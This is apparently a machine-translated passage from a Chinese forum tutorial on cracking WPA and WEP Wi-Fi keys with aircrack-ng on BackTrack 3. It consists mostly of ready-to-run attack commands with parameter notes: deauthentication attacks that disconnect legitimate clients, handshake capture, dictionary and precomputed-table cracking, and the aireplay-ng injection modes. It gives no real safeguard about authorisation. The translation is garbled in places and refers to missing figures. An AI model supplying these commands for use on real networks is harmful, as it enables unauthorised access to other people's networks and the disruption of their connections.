Prerequisite for cracking WPA: there must be a legitimate wireless client
Principle of WPA cracking:
Use of Deauth authentication attack. That is to say, to force the legitimate wireless client to be disconnected from the AP, when it is disconnected from the WLAN, the wireless
client will automatically try to reconnect to the AP, in the process of reconnection, the data communication is generated, and then the use of airodump capture
a wireless router and the wireless client four handshake process to generate a cap packet that contains cap packet of the four handshakes. The dictionary is then used to brute-force
crack it.
1. Activate the NIC and make it work on channel 11
Airmon-ng start wifi0 11
2. Capture the cap packet for channel 11 and save the cap packet as 123.cap
Airodump-ng -w 123 -c 11 wifi0
The above image shows that WPA encryption is used and there is a 0016b69d10ad legitimate wireless client.
3. Perform a Deauth authentication attack to force the connection between the legitimate wireless client and the AP directly to be disconnected and reconnected
aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0
Explanation: -0 refers to the adoption of the Deautenticate attack, followed by the number of times it was sent. -c is recommended to use, the effect will be better, this followed by
is the monitoring of the legitimate connected client MAC address
Note the red part of the figure above, -c followed by the legitimate wireless client's MAC address
Deauth attack is often not a one-time attack on the success of the attack, in order to ensure that the success of the interception of the need to be repeated (WPA cracking) Don't wait until the Data Data reaches
tens of thousands, because it only takes one packet containing WPA 4 handshake authentication). If successfully captured will appear in the red part of the figure below
China Wireless Forum by Zhongwei
AnywhereWLAN!!!! 25
At this point if you enter dir you can see the handshake packet named 123.cap in the root directory.
After getting the handshake packet, you can use the dictionary to crack it
First, copy the dictionary generated by dictionary tool in windows (example password.txt) to the root directory
Double-click on system in the BT3 desktop, and then the following picture appears.
The red left side of the picture is the root directory, the red storage media in the picture, double-click to open it, then you will see the partition of each of your hard disk. You can go to your hard disk partition and right-click copy, then go to the root directory and right-click paste.
Currently, WPA cracking is still based on brute-force cracking and dictionary cracking, and one of the **** of brute-force cracking and dictionary cracking is "time-consuming, laborious, and
lucky", so often you spend a lot of time but still can't break it. The first thing you need to do is to get a good deal of money.
China Wireless Forum
Anywhere WLAN! 26
Cracking Method 1: Direct Violent Cracking with Cap Data Packets
WEP is very easy to crack, as long as you collect enough Cap data packets, you will be able to crack it. WPA cracking requires
a good password dictionary to complete, and complex WPA passwords may not be able to crack it in a few months.
Type: aircrack-ng -z -b <ap mac> 123*.cap
123 is the filename of the handshake packet you got earlier. The system will automatically add -01 and -02 to the filename you entered (if there are too many packets, the system
will automatically divide it into several files to store and name them automatically, you can use ls to view them), entering 123* is to open all 123 related cap files.
Frequently Asked Questions:
The packets collected in step 2 have reached 30W, and the password cannot be cracked. Maybe the system automatically divided into several files to store cap packets.
If you input 123-01.cap to crack it may lead to unsuccessful cracking, it is recommended to use 123*.cap to select all the cap packages to crack.
Chinese wireless forums produced by Zhongwei
AnywhereWLAN!!!
AnywhereWLAN! 27
Cracking method two. Hanging Dictionary Crack
I. Hang dictionary crack directly in BT3
aircrack-ng -w password.txt -b <ap mac> 123.cap
Parameter description: passwrod.txt is the dictionary name 123.cap is the handshake information packet obtained in step 2 The handshake packet obtained in step 2
Took 1 minute and 31 seconds to obtain the WPA password, as shown below
From the above figure, you can see that the cracking took 1 minute and 31 seconds, with a speed of 149.91K/S
Note: This tutorial is only intended to describe the process of cracking. I did make a small 256K dictionary and added the password to the dictionary already beforehand.
II. You can also copy the CAP packet containing 4 handshakes to the hard disk under WIN and use WinAircrack to hang the dictionary to crack it.
Chinese wireless forum produced by Zhongwei
AnywhereWLAN!!!
AnywhereWLAN! 28
Select WPA-PSK at Encryption type in the picture above, and import the captured handshake packet 123.cap at capture files below
Then select the WPA option as shown below
Import the dictionary file password.txt at Dictionary file in the picture above. txt. and then click Aircrack the key in the lower right corner
Chinese Wireless Forums by Zhongwei
AnywhereWLAN!!!
Anywhere WLAN! 29
Then the following prompt appears
Above, select 1 and enter, then start cracking. Successfully cracked the following picture
From the above picture, you can see that the crack took 54 seconds, the speed of 251.73K/S (faster than BT3)
Chinese wireless forums Zhongwei production
AnywhereWLAN! 30
Three. Build WPA table by airolib to realize WPA wire speed cracking
WPA dictionary cracking in addition to direct hanging dictionary cracking, the other is to use airolib will be constructed into a dictionary WPA table and then use aircrac
Crack.
Constructing a WPA table is to use the same algorithm as WPA encryption to generate a hash value, so that when you need to crack directly
Call such a file for comparison, cracking efficiency can be greatly improved.
First, let's talk about building a WPA table via airolib
WPA table has strong ssid-specific features.
1. Before building a WPA table, you need to prepare two files: ssid.txt, a list of ssid files, and a dictionary file
password.txt. The following picture shows my file
You can see the two txt files, ssid.txt, a list of ssid files, you can add common ssid files. common ssid into it, and the passwrod
behind it is the dictionary file.
2. Copy this ssid.txt and password.txt and the handshake packet 123.cap you grabbed above to the root directory for easy access.
See below
3. Start building the WPA table with airolib-ng. Build wpa table save the name as wpahash (below)
The first step, as shown below
airolib-ng wpa --import essid ssid.txt
Chinese wireless forums produced by Zhongwei
AnywhereWLAN!!!
The first step, as shown below
Chinese wireless forums produced by Zhongwei
Chinese wireless forums produced by Zhongwei
AnywhereWLAN!!!! 31
The second step is as follows
airolib-ng wpa --import passwd password.txt
The third step is as follows
airolib-ng wpa --clean all
The fourth step is as follows
airolib-ng wpa --batch
Note: This step will take a long time (depending on the size of the dictionary, I waited 15 minutes for a 256K dictionary)
4. Use aircrack to crack using WPA table
Aircrack-ng -r wpahash 123.cap
Select 1 to start cracking.
Chinese wireless forums by Zhongwei
AnywhereWLAN!!!
Airrack-ng -r wpahash 123. 32
Successful cracking will be shown in the following figure
From the above figure you can see that the time consumed 00:00:00 is not more than 1 second anyway, the speed of 42250.00K/S
You can also see the three kinds of cracking methods, directly hanging the dictionary in the Win under WinAircrack cracking is faster than the speed in the BT3. The direct dictionary
cracked the password in less than a minute, while the WPA table took less than a second to crack, but it took 15 minutes to build the WPA table
. Building a WPA table is time-consuming, but building a WPA table that includes common ssid's and a relatively large dictionary will make it much slower to crack
. Of course there is no one-size-fits-all dictionary, but if there were, and a WPA table of common ssid's was constructed
this pre-computed database would be super, super huge.
Note: The cracker in the CAIN software on the WIN platform can also be used for brute-force and dictionary-based cracking of WEP and WPA, but its cracking speed is very slow,
and it's not practical compared to aircrack-ng.
Chinese wireless forums by Zhongwei
AnywhereWLAN!!!
AnywhereWLAN! 33
6 Attack Modes of Aireplay-ng Explained
-0 Deautenticate Conflict Mode
To make a legitimate client that is already connected forcefully disconnect from the routing side and make it reconnect. During the reconnection process, authentication packets are obtained,
thus generating a valid ARP request.
If a client is connected to the router, but no one is on the Internet to generate valid data, then even with -3, a valid ARP
request cannot be generated.
This is why the -0 attack mode is required, so that the -3 attack is activated immediately. The -3 attack is activated immediately.
aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0
Parameter description:
-0: Conflict Attack Mode followed by the number of times it is sent. (Setting it to 0 will result in a cyclic attack, where the client will be disconnected constantly. can't get on the net normally)
-a: set the mac of the ap
-c: set the mac of the connected legitimate clients. if you don't set -c, disconnect all the legitimate clients that are connected to the ap.
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
Note: The prerequisite for using this attack mode is that there must be an authenticated, legitimate client connected to the router
-1 fakeauth count Fake client connection
This mode fakes a client connection to the AP.
This step is the first step in the clientless hack, as it is a client without a legitimate connection, so a fake client is needed to connect to the router.
In order for the AP to accept packets, it must associate its own NIC with the AP. Without an association, the target AP will ignore all packets sent
from your NIC and no IVS data will be generated. Use -1 to fake a successful client connection before sending the inject command, so that the router can receive the inject
in command before feeding data to generate ARP packets.
aireplay-ng -1 0 -e <ap essid> -a <ap mac> -h <my mac> wifi0
Parameter descriptions:
-1: Disguise the client's connectivity mode, followed by a delay
- -e: Set the ap essid. e: set the essid of the ap
-a: set the mac of the ap
-h: set the MAC of the NIC of the camouflaged client (i.e., your own NIC mac)
-2 Interactive Interactive Mode
This mode of attack is one that captures packets and mentions the data to send out the attack packets, and a collection of the three modes
1. This mode is mainly used to crack no client, first use -1 to establish a false client connection and then directly send packets to attack
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
Parameter description:
-2: Interactive Attack Mode
-p sets the information (in hexadecimal) to be included in the control frame, 0841 is used by default
-c sets the target mac address
-b sets the mac address of the ap
-h sets the NIC MAC of the spoofed client (i.e., your own NIC mac)
2. Extract packets and send injected packets
aireplay-ng -2 -r <file> -x 1024 wifi0
Send packet attack. Where -x 1024 is to limit the speed of sending packets, to avoid the NIC dead, you can choose 1024.
Chinese Wireless Forums Zhongwei Productions
AnywhereWLAN!!!! 34
-3 ARP-request Injection Attack Mode
This mode is a process of grabbing packets and then analyzing them for retransmission
This attack mode is very effective. It can be utilized both with legitimate clients and also with -1 Spoofed clients that utilize virtual connections. If there is a legitimate client
client end that generally need to wait a few minutes to allow communication between the legitimate client and the ap, a small amount of data can generate a valid ARP request before you can utilize the -3
mode of injection success. If no communication exists to get an ARP request. this attack fails. If there is no ARP request for an extended period of time between the legitimate client and
ap, you can try to use the -0 attack at the same time.
If there is no legitimate client, a masquerading client that establishes a virtual connection can be utilized with -1. Authentication packets are obtained during the connection to generate
valid ARP requests. which are then injected through the -3 mode.
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
Parameter description:
-3: arp injection attack mode
-b: set the mac of the ap
-h: set
-x : defines the number of packets sent per second, but the maximum does not exceed 1024, it is recommended to use 512 (can also be undefined)
-4 Chopchop Attack Mode, used to obtain an xor file containing the key data
This mode is mainly used to obtain an xor file that can be utilized to contain the key data, and it can't be used to decrypt the packets. Instead, it is used to generate a new
packet so that we can inject it.
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
Parameter description:
-b: set the mac of the AP to be decrypted
-h: set the mac for the virtual pseudo-connection (i.e., your own NIC's mac)
The -5 fragment packet attack mode is used to obtain a PRGA (a file containing the key with an xor suffix)
This mode is mainly used to obtain a usable PRGA, which is not wep key data and cannot be used to decrypt packets. Instead
it is used to generate a new packet so we can inject it. The way it works is that it causes the target AP to rebroadcast the packet, and when the AP rebroadcasts
a new IVS will be generated, and that's what we're using to decrypt
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
-5: Fragmented packet attack mode
-b: set mac of ap
-h: set mac of virtual pseudo connection (i.e., mac of your own NIC)
Chinese Wireless Forum by Zhongwei
AnywhereWLAN!!!
WLAN0
AnywhereWLAN!!!!! 35
Packetforge-ng: packet maker
Packetforge-ng <mode> <options>
Mode
-0: Fake ARP packets
packetforge-ng -0 - a <ap mac> -h <my mac> wifi0 -k 255.255.255.255.255 -l 255.255.255.255
-y<.xor file> -w mrarp
Parameter description:
-0: spoof arp packets
-a: set mac of ap
-h set mac of virtual spoof connection (i.e., your own mac)
-k<ip[::port]> description: set target file IP and port
-l<ip[:. port]> description: set source file IP and port
-y<file> description: read PRGA from xor file. followed by xor's filename.
-w Set the filename of the disguised arp packet
Aircrack-ng: WEP and WPA-PSK key crack main program
Aircrack-ng [optin] <.cap/.ivs file>
Optin
aircrack-ng -n 64 -b <ap mac> name-01.ivs
Parameter description:
-n: set WEP KEY length (64/128/152/256/512)
aircrack-ng -x -f 2 name-01h.cap
Parameter description:
-x: set to brute force mode
-f: set the complexity, wep password is set to 1, wpa password is set to 2
aircrack-ng -w password.txt ciw.cap
-w: set to dictionary cracking mode, followed by dictionary file, followed by the capture packet
file that captured the WPA authentication that we saved instantly.
Chinese Wireless Forums by Zhongwei
AnywhereWLAN!!!
AnywhereWLAN! 36
Frequently Asked Questions
Question 1: When I start bt3, I get a black screen by typing startx
Answer: After typing the username root and the password toor, you can type in xconf and get a black screen for a while, and then come out of the prompt to type in startx to enter the win window; you can also type in xconf to enter the windows window when you can't enter the win window. When you can't get into the Win window, you can also type in the cracking commands directly at the prompt, and at the same time, you can use alt+f1 to open
a shell, alt+f2 to open the second shell, alt+f3 to open the third one, etc. To close the window, you can use PRINT SCREEN. Close the window with the PRINT SCREEN key
Question 2: When I open kismet in BT3, the window flashes and disappears.
Solution: first load drive ifconfig -a rausb0 start network card listening: airmon-ng start rausb0. find /usr/local/etc/kismet.conf
open this file in the channelsplit=true add a line under source= rt2500,rausb0,monitor
Note: wusb54g v4 must be rt2500 ,not rt2570 as shown when loading the driver.
Brother of 3945 add source=ipw3945,eth0,IPW3945